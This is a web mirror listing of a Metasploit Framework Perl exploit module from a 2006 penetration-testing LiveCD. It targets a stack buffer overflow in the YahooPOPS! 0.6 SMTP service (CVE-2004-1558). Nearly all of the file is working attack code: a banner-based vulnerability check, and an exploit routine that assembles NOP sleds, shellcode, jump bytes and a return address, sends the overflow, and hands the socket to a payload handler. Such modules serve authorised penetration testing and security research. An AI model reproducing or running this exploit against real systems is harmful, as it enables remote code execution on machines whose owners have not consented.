home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / ypops_smtp.pm < prev    next >
Text File  |  2006-06-30  |  4KB  |  159 lines

  1. ##
  2. # This file is part of the Metasploit Framework and may be redistributed
  3. # according to the licenses defined in the Authors field below. In the
  4. # case of an unknown or missing license, this file defaults to the same
  5. # license as the core Framework (dual GPLv2 and Artistic). The latest
  6. # version of the Framework can always be obtained from metasploit.com.
  7. ##
  8.  
  9. package Msf::Exploit::ypops_smtp;
  10. use strict;
  11. use base 'Msf::Exploit';
  12. use Msf::Socket::Tcp;
  13. use Pex::Text;
  14.  
  15. my $advanced = {
  16.   };
  17.  
  18. my $info = {
  19.     'Name'    => 'YahooPOPS! <= 0.6 SMTP Buffer Overflow',
  20.     'Version'  => '$Revision: 1.1 $',
  21.     'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
  22.     'Arch'    => [ 'x86' ],
  23.     'OS'      => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
  24.     'Priv'    => 1,
  25.  
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 25],
  30.       },
  31.  
  32.     'AutoOpts'  => { 'EXITFUNC'  => 'process' },
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 400,
  36.         'BadChars'  => "\x00+&=%\x0a\x0d\x20",
  37.         'Keys'      => ['+ws2ord'],
  38.       },
  39.  
  40.     'Description'  => Pex::Text::Freeform(qq{
  41. This module exploits a stack based buffer overflow in YPOPS! 0.6 SMTP service.
  42. By sending a SMTP message containing more than 504 bytes, a remote attacker 
  43. could overflow a buffer and execute arbitrary code on the system or cause 
  44. the SMTP service to crash.
  45.  
  46.  
  47. }),
  48.  
  49.     'Refs'  =>
  50.       [
  51.         ['BID', '11256'],
  52.         ['CVE', '2004-1558'],
  53.       ],
  54.  
  55.     'Targets' =>
  56.       [
  57.         ['YPOPs! <= 0.6 Universal', 0x10019f97],
  58.       ],
  59.  
  60.     'DefaultTarget' => 0,
  61.  
  62.     'Keys' => ['smtp'],
  63.  
  64.     'DisclosureDate' => 'September 27 2004',
  65.   };
  66.  
  67. sub new {
  68.     my $class = shift;
  69.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  70.  
  71.     return($self);
  72. }
  73.  
  74. sub Check {
  75.     my ($self) = @_;
  76.     my $target_host = $self->GetVar('RHOST');
  77.     my $target_port = $self->GetVar('RPORT');
  78.  
  79.     my $s = Msf::Socket::Tcp->new
  80.       (
  81.         'PeerAddr'  => $target_host,
  82.         'PeerPort'  => $target_port,
  83.         'LocalPort' => $self->GetVar('CPORT'),
  84.         'SSL'       => $self->GetVar('SSL'),
  85.       );
  86.  
  87.     if ($s->IsError) {
  88.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  89.         return $self->CheckCode('Connect');
  90.     }
  91.  
  92.     $s->Send("QUIT\r\n");
  93.     my $res = $s->Recv(-1, 20);
  94.     $s->Close();
  95.  
  96.     if ($res !~ /YahooPOPs! Simple Mail/) {
  97.         $self->PrintLine("[*] This server does not appear to be vulnerable.");
  98.         return $self->CheckCode('Safe');
  99.     }
  100.  
  101.     $self->PrintLine("[*] Vulnerable installation detected :-)");
  102.     return $self->CheckCode('Detected');
  103. }
  104.  
  105. sub Exploit {
  106.     my $self = shift;
  107.     my $targetHost  = $self->GetVar('RHOST');
  108.     my $targetPort  = $self->GetVar('RPORT');
  109.     my $targetIndex = $self->GetVar('TARGET');
  110.     my $encodedPayload = $self->GetVar('EncodedPayload');
  111.     my $shellcode   = $encodedPayload->Payload;
  112.     my $target = $self->Targets->[$targetIndex];
  113.  
  114.     if (! $self->InitNops(128)) {
  115.         $self->PrintLine("[*] Failed to initialize the nop module.");
  116.         return;
  117.     }
  118.     
  119.     my $sock = Msf::Socket::Tcp->new(
  120.         'PeerAddr' => $targetHost,
  121.         'PeerPort' => $targetPort,
  122.       );
  123.  
  124.     if($sock->IsError) {
  125.         $self->PrintLine('Error creating socket: ' . $sock->GetError);
  126.         return;
  127.     }
  128.  
  129.     my $resp = $sock->Recv(-1, 3);
  130.     chomp($resp);
  131.     
  132.     $self->PrintLine('[*] Got Banner: ' . $resp);
  133.     
  134.     my $resp = $sock->Recv(-1, 3);
  135.     if($sock->IsError) {
  136.         $self->PrintLine('Socket error: ' . $sock->GetError);
  137.         return;
  138.     }
  139.  
  140.     $self->PrintLine('[*] Sending overflow...');
  141.  
  142.     my $sploit =
  143.       $self->MakeNops(200). $shellcode. $self->MakeNops(43).
  144.       "\xeb\x06\x92\x46". pack('V', $target->[1]).
  145.       $self->MakeNops(8). ("\xeb\x08\x46\x92" x 50);
  146.  
  147.     my $resp = $sock->Recv(-1, 3);
  148.     if(length($resp)) {
  149.         $self->PrintLine('[*] Got response, bad: ' . $resp);
  150.     }
  151.  
  152.     $sock->Send($sploit);
  153.     $self->Handler($sock);
  154.     $sock->Close();
  155.     return;
  156. }
  157.  
  158. 1;
  159.